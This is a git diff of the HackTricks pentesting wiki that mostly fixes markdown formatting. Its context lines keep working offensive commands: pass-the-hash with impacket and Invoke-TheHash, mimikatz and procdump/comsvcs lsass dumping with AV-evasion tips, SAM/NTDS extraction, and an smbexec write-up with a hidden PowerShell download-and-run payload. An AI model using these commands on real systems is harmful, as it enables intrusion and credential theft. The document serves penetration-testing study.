-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
-### **Best tool to look for Windows local privilege escalation vectors: **[**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)****
+### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)****
 
 ### [System Info](windows-local-privilege-escalation/#system-info)
 
 * [ ] Obtain [**System information**](windows-local-privilege-escalation/#system-info)****
-* [ ] Search for **kernel **[**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)****
+* [ ] Search for **kernel** [**exploits using scripts**](windows-local-privilege-escalation/#version-exploits)****
 * [ ] Use **Google to search** for kernel **exploits**
 * [ ] Use **searchsploit to search** for kernel **exploits**
 * [ ] Interesting info in [**env vars**](windows-local-privilege-escalation/#environment)?
@@ -25,9 +25,9 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
 
-* [ ] Check [**Audit **](windows-local-privilege-escalation/#audit-settings)and [**WEF **](windows-local-privilege-escalation/#wef)settings
+* [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
 * [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)****
-* [ ] Check if [**WDigest **](windows-local-privilege-escalation/#wdigest)is active
+* [ ] Check if [**WDigest** ](windows-local-privilege-escalation/#wdigest)is active
 * [ ] [**LSA Protection**](windows-local-privilege-escalation/#lsa-protection)?
 * [ ] ****[**Credentials Guard**](windows-local-privilege-escalation/#credentials-guard)[?](windows-local-privilege-escalation/#cached-credentials)
 * [ ] [**Cached Credentials**](windows-local-privilege-escalation/#cached-credentials)?
@@ -37,9 +37,9 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### ****[**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
 
-* [ ] Check [**current **user **privileges**](windows-local-privilege-escalation/#users-and-groups)****
+* [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)****
 * [ ] Are you [**member of any privileged group**](windows-local-privilege-escalation/#privileged-groups)?
-* [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ? 
+* [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ?&#x20;
 * [ ] [**Users Sessions**](windows-local-privilege-escalation/#logged-users-sessions)?
 * [ ] Check[ **users homes**](windows-local-privilege-escalation/#home-folders) (access?)
 * [ ] Check [**Password Policy**](windows-local-privilege-escalation/#password-policy)****
@@ -47,8 +47,8 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [Network](windows-local-privilege-escalation/#network)
 
-* [ ] Check **current **[**network** **information**](windows-local-privilege-escalation/#network)****
-* [ ] Check **hidden local services **restricted to the outside
+* [ ] Check **current** [**network** **information**](windows-local-privilege-escalation/#network)****
+* [ ] Check **hidden local services** restricted to the outside
 
 ### [Running Processes](windows-local-privilege-escalation/#running-processes)
 
@@ -58,22 +58,22 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [Services](windows-local-privilege-escalation/#services)
 
-* [ ] [Can you** modify any service**?](windows-local-privilege-escalation/#permissions)
-* [ ] [Can you **modify **the **binary **that is **executed** by any **service**?](windows-local-privilege-escalation/#modify-service-binary-path)
-* [ ] [Can you **modify **the **registry **of any **service**?](windows-local-privilege-escalation/#services-registry-permissions)
-* [ ] [Can you take advantage of any **unquoted service **binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
+* [ ] [Can you **modify any service**?](windows-local-privilege-escalation/#permissions)
+* [ ] [Can you **modify** the **binary** that is **executed** by any **service**?](windows-local-privilege-escalation/#modify-service-binary-path)
+* [ ] [Can you **modify** the **registry** of any **service**?](windows-local-privilege-escalation/#services-registry-permissions)
+* [ ] [Can you take advantage of any **unquoted service** binary **path**?](windows-local-privilege-escalation/#unquoted-service-paths)
 
 ### ****[**Applications**](windows-local-privilege-escalation/#applications)****
 
-* [ ] **Write **[**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)****
+* [ ] **Write** [**permissions on installed applications**](windows-local-privilege-escalation/#write-permissions)****
 * [ ] ****[**Startup Applications**](windows-local-privilege-escalation/#run-at-startup)****
-* [ ] **Vulnerable **[**Drivers**](windows-local-privilege-escalation/#drivers)****
+* [ ] **Vulnerable** [**Drivers**](windows-local-privilege-escalation/#drivers)****
 
 ### [DLL Hijacking](windows-local-privilege-escalation/#path-dll-hijacking)
 
 * [ ] Can you **write in any folder inside PATH**?
 * [ ] Is there any known service binary that **tries to load any non-existant DLL**?
-* [ ] Can you **write **in any **binaries folder**?
+* [ ] Can you **write** in any **binaries folder**?
 
 ### [Network](windows-local-privilege-escalation/#network)
 
@@ -82,11 +82,11 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [Windows Credentials](windows-local-privilege-escalation/#windows-credentials)
 
-* [ ] ****[**Winlogon **](windows-local-privilege-escalation/#winlogon-credentials)credentials
+* [ ] ****[**Winlogon** ](windows-local-privilege-escalation/#winlogon-credentials)credentials
 * [ ] [**Windows Vault**](windows-local-privilege-escalation/#windows-vault) credentials that you could use?
 * [ ] Interesting [**DPAPI credentials**](windows-local-privilege-escalation/#dpapi)?
 * [ ] Passwords of saved [**Wifi networks**](windows-local-privilege-escalation/#wifi)?
-* [ ] Interesting info in** **[**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
+* [ ] Interesting info in **** [**saved RDP Connections**](windows-local-privilege-escalation/#saved-rdp-connections)?
 * [ ] Passwords in [**recently run commands**](windows-local-privilege-escalation/#recently-run-commands)?
 * [ ] [**Remote Desktop Credentials Manager**](windows-local-privilege-escalation/#remote-desktop-credential-manager) passwords?
 * [ ] [**AppCmd.exe** exists](windows-local-privilege-escalation/#appcmd-exe)? Credentials?
@@ -94,7 +94,7 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 ### [Files and Registry (Credentials)](windows-local-privilege-escalation/#files-and-registry-credentials)
 
-* [ ] **Putty: **[**Creds**](windows-local-privilege-escalation/#putty-creds)** and **[**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)****
+* [ ] **Putty:** [**Creds**](windows-local-privilege-escalation/#putty-creds) **and** [**SSH host keys**](windows-local-privilege-escalation/#putty-ssh-host-keys)****
 * [ ] ****[**SSH keys in registry**](windows-local-privilege-escalation/#ssh-keys-in-registry)?
 * [ ] Passwords in [**unattended files**](windows-local-privilege-escalation/#unattended-files)?
 * [ ] Any [**SAM & SYSTEM**](windows-local-privilege-escalation/#sam-and-system-backups) backup?
@@ -122,8 +122,8 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 
 
-If you want to **know **about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**,** **join the [💬](https://emojipedia.org/speech-balloon/)** **[**PEASS & HackTricks telegram group here**](https://t.me/peass), or** follow me on Twitter **[🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-****If you want to** share some tricks with the community **you can also submit **pull requests **to** **[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks)** **that will be reflected in this book.\
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
 ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (4).png>)
diff --git a/windows/ntlm/README.md b/windows/ntlm/README.md
index 75c00730..9bae2e5d 100644
--- a/windows/ntlm/README.md
+++ b/windows/ntlm/README.md
@@ -4,11 +4,11 @@
 
 **NTLM Credentials**: Domain name (if any), username and password hash.
 
-**LM **is only **enabled **in** Windows XP and server 2003 **(LM hashes can be cracked). The LM hash AAD3B435B51404EEAAD3B435B51404EE means that LM is not being used (is the LM hash of empty string).
+**LM** is only **enabled** in **Windows XP and server 2003** (LM hashes can be cracked). The LM hash AAD3B435B51404EEAAD3B435B51404EE means that LM is not being used (is the LM hash of empty string).
 
-By default **Kerberos **is **used**, so NTLM will only be used if** there isn't any Active Directory configured, **the **Domain doesn't exist**, **Kerberos isn't working** (bad configuration) or the **client **that tries to connect using the IP instead of a valid host-name.
+By default **Kerberos** is **used**, so NTLM will only be used if **there isn't any Active Directory configured,** the **Domain doesn't exist**, **Kerberos isn't working** (bad configuration) or the **client** that tries to connect using the IP instead of a valid host-name.
 
-The **network packets **of a **NTLM authentication **have the **header **"**NTLMSSP**".
+The **network packets** of a **NTLM authentication** have the **header** "**NTLMSSP**".
 
 The protocols: LM, NTLMv1 and NTLMv2 are supported in the DLL %windir%\Windows\System32\msv1\_0.dll
 
@@ -43,57 +43,57 @@ Possible values:
 
 ## Basic NTLM Domain authentication Scheme
 
-1. The **user **introduces his **credentials**
+1. The **user** introduces his **credentials**
 2. The client machine **sends an authentication request** sending the **domain name** and the **username**
-3. The **server **sends the **challenge**
-4. The **client encrypts **the **challenge **using the hash of the password as key and sends it as response
-5. The **server sends **to the **Domain controller **the **domain name, the username, the challenge and the response**. If there **isn't** an Active Directory configured or the domain name is the name of the server, the credentials are **checked locally**.
+3. The **server** sends the **challenge**
+4. The **client encrypts** the **challenge** using the hash of the password as key and sends it as response
+5. The **server sends** to the **Domain controller** the **domain name, the username, the challenge and the response**. If there **isn't** an Active Directory configured or the domain name is the name of the server, the credentials are **checked locally**.
 6. The **domain controller checks if everything is correct** and sends the information to the server
 
-The **server **and the **Domain Controller** are able to create a **Secure Channel** via **Netlogon **server as the Domain Controller know the password of the server (it is inside the **NTDS.DIT** db).
+The **server** and the **Domain Controller** are able to create a **Secure Channel** via **Netlogon** server as the Domain Controller know the password of the server (it is inside the **NTDS.DIT** db).
 
 ### Local NTLM authentication Scheme
 
-The authentication is as the one mentioned **before but **the **server **knows the **hash of the user** that tries to authenticate inside the **SAM **file. So, instead of asking the Domain Controller, the **server will check itself** if the user can authenticate.
+The authentication is as the one mentioned **before but** the **server** knows the **hash of the user** that tries to authenticate inside the **SAM** file. So, instead of asking the Domain Controller, the **server will check itself** if the user can authenticate.
 
 ### NTLMv1 Challenge
 
 The **challenge length is 8 bytes** and the **response is 24 bytes** long.
 
-The **hash NT (16bytes)** is divided in **3 parts of 7bytes each** (7B + 7B + (2B+0x00\*5)): the** last part is filled with zeros**. Then, the **challenge **is **ciphered separately **with each part and the **resulting **ciphered bytes are **joined**. Total: 8B + 8B + 8B = 24Bytes.
+The **hash NT (16bytes)** is divided in **3 parts of 7bytes each** (7B + 7B + (2B+0x00\*5)): the **last part is filled with zeros**. Then, the **challenge** is **ciphered separately** with each part and the **resulting** ciphered bytes are **joined**. Total: 8B + 8B + 8B = 24Bytes.
 
 **Problems**:
 
 * Lack of **randomness**
-* The 3 parts can be **attacked separately **to find the NT hash
+* The 3 parts can be **attacked separately** to find the NT hash
 * **DES is crackable**
-* The 3º key is composed always by** 5 zeros**.
-* Given the** same challenge** the **response **will be **same**. So, you can give as a **challenge **to the victim the string "**1122334455667788**" and attack the response used **precomputed rainbow tables**.
+* The 3º key is composed always by **5 zeros**.
+* Given the **same challenge** the **response** will be **same**. So, you can give as a **challenge** to the victim the string "**1122334455667788**" and attack the response used **precomputed rainbow tables**.
 
 ### NTLMv1 attack
 
 Nowadays is becoming less common to find environments with Unconstrained Delegation configured, but this doesn't mean you can't **abuse a Print Spooler service** configured.
 
-You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 1122334455667788**, capture the authentication attempt, and if it was done using** NTLMv1** you will be able to **crack it**.\
-If you are using `responder` you could try to** use the flag `--lm` **to try to **downgrade **the **authentication**.\
+You could abuse some credentials/sessions you already have on the AD to **ask the printer to authenticate** against some **host under your control**. Then, using `metasploit auxiliary/server/capture/smb` or `responder` you can **set the authentication challenge to 1122334455667788**, capture the authentication attempt, and if it was done using **NTLMv1** you will be able to **crack it**.\
+If you are using `responder` you could try to **use the flag `--lm` ** to try to **downgrade** the **authentication**.\
 _Note that for this technique the authentication must be performed using NTLMv1 (NTLMv2 is not valid)._
 
-Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication** uses DES** ([more info here](./#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) for example).
+Remember that the printer will use the computer account during the authentication, and computer accounts use **long and random passwords** that you **probably won't be able to crack** using common **dictionaries**. But the **NTLMv1** authentication **uses DES** ([more info here](./#ntlmv1-challenge)), so using some services specially dedicated to cracking DES you will be able to crack it (you could use [https://crack.sh/](https://crack.sh) for example).
 
 ### NTLMv2 Challenge
 
-The **challenge length is 8 bytes** and **2 responses are sent**: One is **24 bytes** long and the length of the **other **is **variable**.
+The **challenge length is 8 bytes** and **2 responses are sent**: One is **24 bytes** long and the length of the **other** is **variable**.
 
-**The first response** is created by ciphering using **HMAC\_MD5 **the **string **composed by the **client and the domain** and using as **key **the **hash MD4 **of the** NT hash**. Then, the **result **will by used as **key **to cipher using **HMAC\_MD5 **the **challenge**. To this, **a client challenge of 8 bytes will be added**. Total: 24 B.
+**The first response** is created by ciphering using **HMAC\_MD5** the **string** composed by the **client and the domain** and using as **key** the **hash MD4** of the **NT hash**. Then, the **result** will by used as **key** to cipher using **HMAC\_MD5** the **challenge**. To this, **a client challenge of 8 bytes will be added**. Total: 24 B.
 
-The **second response** is created using** several values** (a new client challenge, a **timestamp **to avoid **replay attacks**...)
+The **second response** is created using **several values** (a new client challenge, a **timestamp** to avoid **replay attacks**...)
 
 If you have a **pcap that has captured a successful authentication process**, you can follow this guide to get the domain, username , challenge and response and try to creak the password: [https://research.801labs.org/cracking-an-ntlmv2-hash/](https://research.801labs.org/cracking-an-ntlmv2-hash/)
 
 ## Pass-the-Hash
 
-**Once you have the hash of the victim**, you can use it to **impersonate **it.\
-You need to use a **tool **that will **perform **the **NTLM authentication using **that **hash**, **or **you could create a new **sessionlogon **and **inject **that **hash **inside the **LSASS**, so when any **NTLM authentication is performed**, that** hash will be used. **The last option is what mimikatz does.
+**Once you have the hash of the victim**, you can use it to **impersonate** it.\
+You need to use a **tool** that will **perform** the **NTLM authentication using** that **hash**, **or** you could create a new **sessionlogon** and **inject** that **hash** inside the **LSASS**, so when any **NTLM authentication is performed**, that **hash will be used.** The last option is what mimikatz does.
 
 **Please, remember that you can perform Pass-the-Hash attacks also using Computer accounts.**
 
@@ -116,8 +116,8 @@ You can obtain code execution in Windows machines using Pass-the-Hash from Linux
 
 You can download[ impacket binaries for Windows here](https://github.com/ropnop/impacket\_static\_binaries/releases/tag/0.9.21-dev-binaries).
 
-* **psexec\_windows.exe **`C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
-* **wmiexec.exe **`wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
+* **psexec\_windows.exe** `C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local`
+* **wmiexec.exe** `wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local`
 * **atexec.exe** (In this case you need to specify a command, cmd.exe and powershell.exe are not valid to obtain an interactive shell)`C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'`
 * There are several more Impacket binaries...
 
@@ -151,7 +151,7 @@ Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff
 
 #### Invoke-TheHash
 
-This function is a **mix of all the others**. You can pass** several hosts**, **exclude **someones and **select **the **option **you want to use (_SMBExec, WMIExec, SMBClient, SMBEnum_). If you select **any **of **SMBExec **and **WMIExec **but you **don't **give any _**Command **_parameter it will just **check **if you have **enough permissions**.
+This function is a **mix of all the others**. You can pass **several hosts**, **exclude** someones and **select** the **option** you want to use (_SMBExec, WMIExec, SMBClient, SMBEnum_). If you select **any** of **SMBExec** and **WMIExec** but you **don't** give any _**Command**_ parameter it will just **check** if you have **enough permissions**.
 
 ```
 Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0
@@ -178,7 +178,7 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 
 ## Extracting credentials from a Windows Host
 
-**For more information about **[**how to obtain credentials from a Windows host you should read this page**](../stealing-credentials/)**.**
+**For more information about** [**how to obtain credentials from a Windows host you should read this page**](../stealing-credentials/)**.**
 
 ## NTLM Relay and Responder
 
@@ -190,4 +190,4 @@ wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
 
 ## Parse NTLM challenges from a network capture
 
-**You can use **[**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)****
+**You can use** [**https://github.com/mlgualtieri/NTLMRawUnHide**](https://github.com/mlgualtieri/NTLMRawUnHide)****
diff --git a/windows/ntlm/smbexec.md b/windows/ntlm/smbexec.md
index 50c39519..967590ae 100644
--- a/windows/ntlm/smbexec.md
+++ b/windows/ntlm/smbexec.md
@@ -2,17 +2,17 @@
 
 ## How does it works
 
-**Smbexec works like Psexec. **In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
+**Smbexec works like Psexec.** In this example**,** **instead** of pointing the "_binpath_" to a malicious executable inside the victim, we are going to **point it** to **cmd.exe or powershell.exe** and one of they will download and execute the backdoor.
 
 ## **SMBExec**
 
 Let's see what happens when smbexec runs by looking at it from the attackers and target's side:
 
-![](../../.gitbook/assets/smbexec_prompt.png)
+![](../../.gitbook/assets/smbexec\_prompt.png)
 
 So we know it creates a service "BTOBTO". But that service isn't present on the target machine when we do an `sc query`. The system logs reveal a clue to what happened:
 
-![](../../.gitbook/assets/smbexec_service.png)
+![](../../.gitbook/assets/smbexec\_service.png)
 
 The Service File Name contains a command string to execute (%COMSPEC% points to the absolute path of cmd.exe). It echoes the command to be executed to a bat file, redirects the stdout and stderr to a Temp file, then executes the bat file and deletes it. Back on Kali, the Python script then pulls the output file via SMB and displays the contents in our "pseudo-shell". For every command we type into our "shell", a new service is created and the process is repeated. This is why it doesn't need to drop a binary, it just executes each desired command as a new service. Definitely more stealthy, but as we saw, an event log is created for every command executed. Still a very clever way to get a non-interactive "shell"!
 
@@ -30,11 +30,11 @@ powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRe
 
 From our Windows attack box, we create a remote service ("metpsh") and set the binPath to execute cmd.exe with our payload:
 
-![](../../.gitbook/assets/sc_psh_create.png)
+![](../../.gitbook/assets/sc\_psh\_create.png)
 
 And then start it:
 
-![](../../.gitbook/assets/sc_psh_start.png)
+![](../../.gitbook/assets/sc\_psh\_start.png)
 
 It errors out because our service doesn't respond, but if we look at our Metasploit listener we see that the callback was made and the payload executed.
 
diff --git a/windows/ntlm/winrm.md b/windows/ntlm/winrm.md
index 0fd24f3b..b3afc7ee 100644
--- a/windows/ntlm/winrm.md
+++ b/windows/ntlm/winrm.md
@@ -1,3 +1,3 @@
 # WinRM
 
-For information about** **[**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
+For information about **** [**WinRM read this page**](../../pentesting/5985-5986-pentesting-winrm.md).
diff --git a/windows/stealing-credentials/README.md b/windows/stealing-credentials/README.md
index 96518054..7640c338 100644
--- a/windows/stealing-credentials/README.md
+++ b/windows/stealing-credentials/README.md
@@ -14,7 +14,7 @@ lsadump::sam
 mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"
 ```
 
-**Find other things that Mimikatz can do in **[**this page**](credentials-mimikatz.md)**.**
+**Find other things that Mimikatz can do in** [**this page**](credentials-mimikatz.md)**.**
 
 ### Invoke-Mimikatz
 
@@ -24,11 +24,11 @@ Invoke-Mimikatz -DumpCreds #Dump creds from memory
 Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
 ```
 
-[**Learn about some possible credentials protections here.**](credentials-protections.md)** This protections could prevent Mimikatz from extracting some credentials.**
+[**Learn about some possible credentials protections here.**](credentials-protections.md) **This protections could prevent Mimikatz from extracting some credentials.**
 
 ## Credentials with Meterpreter
 
-Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials)** that **I have created to **search for passwords and hashes** inside the victim.
+Use the [**Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **that** I have created to **search for passwords and hashes** inside the victim.
 
 ```bash
 #Credentials from SAM
@@ -50,8 +50,8 @@ mimikatz_command -f "lsadump::sam"
 
 ### Procdump + Mimikatz
 
-As** Procdump from **[**SysInternals **](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender. \
-You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally **from the dump.
+As **Procdump from** [**SysInternals** ](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite)**is a legitimate Microsoft tool**, it's not detected by Defender. \
+You can use this tool to **dump the lsass process**, **download the dump** and **extract** the **credentials locally** from the dump.
 
 {% code title="Dump lsass" %}
 ```bash
@@ -74,11 +74,11 @@ mimikatz # sekurlsa::logonPasswords
 
 This process is done automatically with [SprayKatz](https://github.com/aas-n/spraykatz): `./spraykatz.py -u H4x0r -p L0c4L4dm1n -t 192.168.1.0/24`
 
-**Note**: Some **AV **may **detect **as **malicious **the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting **the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier **to **pass **as an **argument **the **PID **of lsass.exe to procdump **instead o**f the **name lsass.exe.**
+**Note**: Some **AV** may **detect** as **malicious** the use of **procdump.exe to dump lsass.exe**, this is because they are **detecting** the string **"procdump.exe" and "lsass.exe"**. So it is **stealthier** to **pass** as an **argument** the **PID** of lsass.exe to procdump **instead o**f the **name lsass.exe.**
 
 ### Dumping lsass with **comsvcs.dll**
 
-There’s a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function **called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\
+There’s a DLL called **comsvcs.dll**, located in `C:\Windows\System32` that **dumps process memory** whenever they **crash**. This DLL contains a **function** called **`MiniDumpW`** that is written so it can be called with `rundll32.exe`.\
 The first two arguments are not used, but the third one is split into 3 parts. First part is the process ID that will be dumped, second part is the dump file location, and third part is the word **full**. There is no other choice.\
 Once these 3 arguments has been parsed, basically this DLL creates the dump file, and dumps the specified process into that dump file.\
 Thanks to this function, we can use **comsvcs.dll** to dump lsass process instead of uploading procdump and executing it. (This information was extracted from [https://en.hackndo.com/remote-lsass-dump-passwords/](https://en.hackndo.com/remote-lsass-dump-passwords/))
@@ -89,7 +89,7 @@ rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full
 
 We just have to keep in mind that this technique can only be executed as **SYSTEM**.
 
-**You can automate this process with **[**lssasy**](https://github.com/Hackndo/lsassy)**.**
+**You can automate this process with** [**lssasy**](https://github.com/Hackndo/lsassy)**.**
 
 ## CrackMapExec
 
@@ -112,7 +112,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
 #~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
 ```
 
-### Dump the NTDS.dit password history from target DC 
+### Dump the NTDS.dit password history from target DC&#x20;
 
 ```
 #~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history
@@ -126,7 +126,7 @@ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
 
 ## Stealing SAM & SYSTEM
 
-This files should be **located **in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM. _But **you cannot just copy them in a regular way **because they protected.
+This files should be **located** in _C:\windows\system32\config\SAM_ and _C:\windows\system32\config\SYSTEM._ But **you cannot just copy them in a regular way** because they protected.
 
 ### From Registry
 
@@ -138,7 +138,7 @@ reg save HKLM\system system
 reg save HKLM\security security
 ```
 
-**Download **those files to your Kali machine and **extract the hashes** using:
+**Download** those files to your Kali machine and **extract the hashes** using:
 
 ```
 samdump2 SYSTEM SAM
@@ -166,7 +166,7 @@ copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Ex
 mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
 ```
 
-But you can do the same from **Powershell**. This is an example of** how to copy the SAM file **(the hard drive used is "C:" and its saved to C:\users\Public) but you can use this for copying any protected file:
+But you can do the same from **Powershell**. This is an example of **how to copy the SAM file** (the hard drive used is "C:" and its saved to C:\users\Public) but you can use this for copying any protected file:
 
 ```bash
 $service=(Get-Service -name VSS)
@@ -191,8 +191,8 @@ Invoke-NinjaCopy.ps1 -Path "C:\Windows\System32\config\sam" -LocalDestination "c
 
 **The Ntds.dit file is a database that stores Active Directory data**, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain.
 
-The important NTDS.dit file will be** located in**: _%SystemRoom%/NTDS/ntds.dit_\
-__This file is a database_ Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables:
+The important NTDS.dit file will be **located in**: _%SystemRoom%/NTDS/ntds.dit_\
+__This file is a database _Extensible Storage Engine_ (ESE) and is "officially" composed by 3 tables:
 
 * **Data Table**: Contains the information about the objects (users, groups...)
 * **Link Table**: Information about the relations (member of...)
@@ -200,17 +200,17 @@ __This file is a database_ Extensible Storage Engine_ (ESE) and is "officially"
 
 More information about this: [http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/](http://blogs.chrisse.se/2012/02/11/how-the-active-directory-data-store-really-works-inside-ntds-dit-part-1/)
 
-Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part **of the **NTDS.dit** file could be located **inside the **_**lsass **_**memory **(you can find the lastet accessed data probably because of the performance impruve by using a **cache**).
+Windows uses _Ntdsa.dll_ to interact with that file and its used by _lsass.exe_. Then, **part** of the **NTDS.dit** file could be located **inside the **_**lsass**_** memory** (you can find the lastet accessed data probably because of the performance impruve by using a **cache**).
 
 #### Decrypting the hashes inside NTDS.dit
 
 The hash is cyphered 3 times:
 
-1. Decrypt Password Encryption Key (**PEK**) using the **BOOTKEY **and **RC4**.
-2. Decrypt tha **hash **using **PEK **and **RC4**.
-3. Decrypt the **hash **using **DES**.
+1. Decrypt Password Encryption Key (**PEK**) using the **BOOTKEY** and **RC4**.
+2. Decrypt tha **hash** using **PEK** and **RC4**.
+3. Decrypt the **hash** using **DES**.
 
-**PEK **have the** same value** in **every domain controller**, but it is **cyphered **inside the **NTDS.dit** file using the **BOOTKEY **of the **SYSTEM file of the domain controller (is different between domain controllers)**. This is why to get the credentials from the NTDS.dit file **you need the files NTDS.dit and SYSTEM **(_C:\Windows\System32\config\SYSTEM_).
